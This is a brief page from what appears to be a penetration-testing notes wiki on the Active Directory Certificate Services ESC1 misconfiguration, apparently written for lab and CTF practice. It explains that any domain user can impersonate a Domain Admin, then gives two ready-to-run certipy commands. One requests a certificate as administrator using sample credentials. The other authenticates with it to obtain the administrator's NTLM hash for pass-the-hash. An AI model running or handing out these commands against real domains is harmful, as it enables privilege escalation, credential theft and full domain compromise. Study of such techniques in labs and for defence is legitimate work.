search
DiscordHackTheBoxTryHackMeGitHub

ESC1

hashtag
ABOUT

ESC1 (from ESCalate) allows any domain user to impersonate (become) a Domain Admin or any other user by requesting a certificate "as them" and logging in using that certificate.

hashtag
EXPLOITATION

hashtag
Request Cert as Admin

certipy req -u 'Solomon.Reed@militech.local' -p 'SuperAgent12' -dc-ip 13.13.13.13 -target 13.13.13.13 -ca militech-DC-CA -template UserAuthentication -upn administrator@militech.local -debug

hashtag
Auth as Admin

certipy auth -pfx administrator.pfx -dc-ip 13.13.13.13

In the result we would have administrator's NTLM hash we could use for PTH.

hashtag
RESOURCES

LogoAD Certificate Exploitation: ESC1Hacking Articleschevron-right
PreviousADCSNextESC9

Last updated